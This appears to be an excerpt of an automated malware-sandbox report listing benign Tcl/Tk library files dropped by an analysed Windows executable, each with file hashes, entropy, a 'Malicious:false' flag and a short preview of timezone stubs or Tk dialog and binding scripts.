                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                              Entropy (8bit):4.87340978435866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/iGIfh4903GKT:MByMY3GKDp3GKItiBfh4903GKT
                                                                                                                                                                                                                              MD5:00AAFD60A0B1146274981FAB6336AFD9
                                                                                                                                                                                                                              SHA1:20AD47ED52874202585C90FE362663F060E064D3
                                                                                                                                                                                                                              SHA-256:5827B6A6D50CF0FB75D6BA6E36282591AD25E1F0BE636DCFC5D09BDA29A107FD
                                                                                                                                                                                                                              SHA-512:61113AB72B7D671D7B429106709E73DB57D5B8A382680BA37A54126C7F54BC2D6B47A2584177CE6B434793546DA7EB9B8B7DF9163816DBFC67C83D9930D6A158
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.83459089067994
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06FQGFfXHAIg206FQJARL/iHaMCELMr4IAcGE6FQB:SlSWB9vsM3y74PFPHAIgp4KAN/iHaMHs
                                                                                                                                                                                                                              MD5:D955A5A943B203DC4B87A91ED196B82A
                                                                                                                                                                                                                              SHA1:C7ACC48AB2033C372C60C741F68B12FFAEA147DE
                                                                                                                                                                                                                              SHA-256:B4E4269C4FEBFEFF26750B297A590226C0A6872519A6BFDE36F6DC3F6F756349
                                                                                                                                                                                                                              SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.892777905787396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                                                                                                              MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                                                                                                              SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                                                                                                              SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                                                                                                              SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.932311644026309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                                                                                                              MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                                                                                                              SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                                                                                                              SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                                                                                                              SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.838968615416201
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                                                                                                              MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                                                                                                              SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                                                                                                              SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                                                                                                              SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                                                                                                              MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                                                                                                              SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                                                                                                              SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                                                                                                              SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.879221007428352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                                                                                                              MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                                                                                                              SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                                                                                                              SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                                                                                                              SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.999171213761279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                                                                                                              MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                                                                                                              SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                                                                                                              SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                                                                                                              SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6945
                                                                                                                                                                                                                              Entropy (8bit):3.7806395604065135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                                                                                                              SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                                                                                                              SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                                                                                                              SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                              Entropy (8bit):4.8800842076244715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                                                                                                              MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                                                                                                              SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                                                                                                              SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                                                                                                              SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5030
                                                                                                                                                                                                                              Entropy (8bit):4.838527643033185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                                                                                                              MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                                                                                                              SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                                                                                                              SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                                                                                                              SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8806
                                                                                                                                                                                                                              Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                              MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                              SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                              SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                              SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21612
                                                                                                                                                                                                                              Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                              MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                              SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                              SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                              SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9960
                                                                                                                                                                                                                              Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                              MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                              SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                              SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                              SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22103
                                                                                                                                                                                                                              Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                              MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                              SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                              SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                              SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8690
                                                                                                                                                                                                                              Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                              MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                              SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                              SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                              SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33347
                                                                                                                                                                                                                              Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                              MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                              SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                              SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                              SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5988
                                                                                                                                                                                                                              Entropy (8bit):4.829498876074983
                                                                                                                                                                                                                              Encrypted:false
